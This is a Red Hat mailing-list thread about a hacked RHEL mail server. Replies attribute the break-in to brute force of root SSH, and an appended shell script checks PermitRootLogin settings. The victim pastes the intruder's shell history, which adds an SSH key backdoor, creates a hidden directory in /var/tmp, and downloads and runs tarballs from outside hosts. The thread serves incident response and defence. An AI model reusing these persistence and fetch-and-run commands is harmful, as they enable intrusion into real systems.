Re: help


Agreed. 

Also, never allow root login via ssh.
Always keep the OS up to date with at least security patches.

This should not be news to this audience.


----- Original Message -----
From: redhat-list-bounces@xxxxxxxxxx <redhat-list-bounces@xxxxxxxxxx>
To: General Red Hat Linux discussion list <redhat-list@xxxxxxxxxx>
Sent: Thu Jan 28 08:11:44 2010
Subject: Re: help

Brute force attacks. Leaving root ssh open to the world is begging to
be owned like this. Always turn that off or use key only auth for root
on Internet facing boxes.

Sent from my iPhone

On Jan 28, 2010, at 0:33, "Joy Methew" <ml4joy@xxxxxxxxx> wrote:

> Still I'm thinking how he/she got my password??
>
>
> On Thu, Jan 28, 2010 at 11:58 AM, Joy Methew <ml4joy@xxxxxxxxx> wrote:
>
>> I have changed my root password
>>
>>
>> On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan <Wahyu.Darmawan@xxxxxxxxx> wrote:
>>
>>> You may change your root password first, and then you can continue to
>>> analyze your system.
>>>
>>> ________________________________________
>>> From: redhat-list-bounces@xxxxxxxxxx [redhat-list-bounces@xxxxxxxxxx] On Behalf Of Joy Methew [ml4joy@xxxxxxxxx]
>>> Sent: Thursday, January 28, 2010 12:59 PM
>>> To: General Red Hat Linux discussion list
>>> Subject: help
>>>
>>> Hello all,
>>> I am using RHEL 5.3 as my mail server with a real IP. I configure my
>>> system mostly remotely. The last login time on my system was 27 Jan,
>>> from this IP: 118.129.153.43.
>>> Then I tried to log in on 28 Jan in the morning, and I could not
>>> authenticate as root with my last password.
>>> Then I rebooted the system and reset my password.
>>> I logged in as root, then I ran the "last" command. I am sending the
>>> first 10 lines of the last command... I think someone hacked my system.
>>> I am sending the history command output.
>>> Now I have removed the .ssh directory and /var/tmp/*
>>>
>>> Please suggest, what is this??
>>>
>>> Thanks
>>>
>>> last command output:
>>> root     pts/1        117.199.118.234  Thu Jan 28 10:58   still logged in
>>> root     pts/0        117.199.118.234  Thu Jan 28 10:49   still logged in
>>> root     tty1                          Thu Jan 28 10:48 - 10:52  (00:04)
>>> reboot   system boot  2.6.18-128.el5PA Thu Jan 28 10:45          (00:25)
>>> root     pts/2        165.red-79-153-1 Thu Jan 28 01:42 - 01:52  (00:09)
>>> root     pts/2        165.red-79-153-1 Wed Jan 27 23:02 - 01:27  (02:25)
>>> root     pts/2        165.red-79-153-1 Wed Jan 27 22:33 - 22:34  (00:00)
>>> root     pts/3        165.red-79-153-1 Wed Jan 27 22:32 - 22:33  (00:00)
>>> root     pts/2        118.129.153.43   Wed Jan 27 22:31 - 22:32  (00:01)
>>> root     pts/2        117.199.114.189  Wed Jan 27 15:47 - 15:51  (00:03)
>>>
>>> What is 165.red-79........? This is not my IP.
>>>
>>>
>>> History Output
>>>
>>> 115  cat /proc/cpuinfo
>>> 116  mkdir .ssh
>>> 117  cd .ssh
>>> 118  echo ssh-rsa
>>>
>>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH 
>>> +iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ 
>>> +xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf 
>>> +I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh;  
>>> chmod 600
>>> ~/.ssh/authorized_keys
>>> 119  cd /var/tmp
>>> 120  mkdir " "
>>> 121  cd " "
>>> 122  passwd
>>> 123  echo ssh-rsa
>>>
>>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH 
>>> +iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ 
>>> +xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf 
>>> +I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh;  
>>> chmod 600
>>> ~/.ssh/authorized_keys
>>> 124  ps -x
>>> 125  cd /var/tmp
>>> 126  w
>>> 127  wget http://kok.ucoz.de/gosh.tgz
>>> 128  tar xvf gosh.tgz
>>> 129  cd gosh
>>> 130  chmod +x *
>>> 131  ./go.sh 121
>>> 132  w
>>> 133  ps -x
>>> 134  ps -aux
>>> 135  cd /var/tmp
>>> 136  cd " "
>>> 137  ls -a
>>> 138  wget http://helpbnc.myftp.org/danger/fld.tgz
>>> 139  tar xzvf fld.tgz
>>> 140  cd fld
>>> 141  chmod +x *
>>> 142  nano cyc.acc
>>> 143  nano cyc.acc.1
>>> 144  nano cyc.set
>>> 145  ./httpd
>>> 146  w
>>> --
>>> redhat-list mailing list
>>> unsubscribe mailto:redhat-list-request@xxxxxxxxxx? 
>>> subject=unsubscribe
>>> https://www.redhat.com/mailman/listinfo/redhat-list
>>>
>>
>>

-- 
redhat-list mailing list
unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list
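
The root-login advice in the replies above, as an added example that is not part of the original thread: a POSIX shell check of the global section of an sshd_config. The function names sshd_effective and audit_root_login and the sample config are constructed here; an unset PermitRootLogin is assumed to mean "yes", the default in older OpenSSH releases.

```shell
#!/bin/sh
# Added example (not from the thread): check the global section of an
# sshd_config against the root-login advice. Function names are made up here.

# Print the effective value of KEYWORD in FILE. sshd keeps the first value it
# reads for a keyword and matches keywords case-insensitively; parsing stops
# at the first Match block, so only global settings are reported.
sshd_effective() {
    awk -v want="$1" '
        BEGIN { want = tolower(want) }
        /^[ \t]*(#|$)/ { next }                  # comments and blank lines
        {
            line = $0
            sub(/^[ \t]+/, "", line)
            if (!match(line, /^[^ \t=]+/)) next
            key = tolower(substr(line, 1, RLENGTH))
            val = substr(line, RLENGTH + 1)
            sub(/^[ \t]*=?[ \t]*/, "", val)      # "Key Value" or "Key=Value"
            sub(/[ \t].*$/, "", val)             # keep the first argument
            if (key == "match") exit
            if (key == want) { print tolower(val); exit }
        }' "$2"
}

# Print a verdict for root logins; return 0 when root cannot use a password.
audit_root_login() {
    # Assumption: an unset PermitRootLogin counts as "yes", the default in
    # older OpenSSH releases such as the one RHEL 5 ships.
    case "$(sshd_effective PermitRootLogin "$1")" in
        no)  echo "root-login-disabled" ;;
        without-password|prohibit-password|forced-commands-only)
             echo "root-key-only" ;;
        *)   echo "root-password-login-allowed"; return 1 ;;
    esac
}

# Constructed sample: the commented line is ignored and the first live
# PermitRootLogin wins, so the later "no" has no effect.
demo_conf=$(mktemp)
printf '%s\n' '#PermitRootLogin no' 'permitrootlogin yes' \
    'PermitRootLogin no' > "$demo_conf"
audit_root_login "$demo_conf" || :
rm -f "$demo_conf"
```

On a live host, point audit_root_login at /etc/ssh/sshd_config; settings inside Match blocks are not evaluated by this check.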
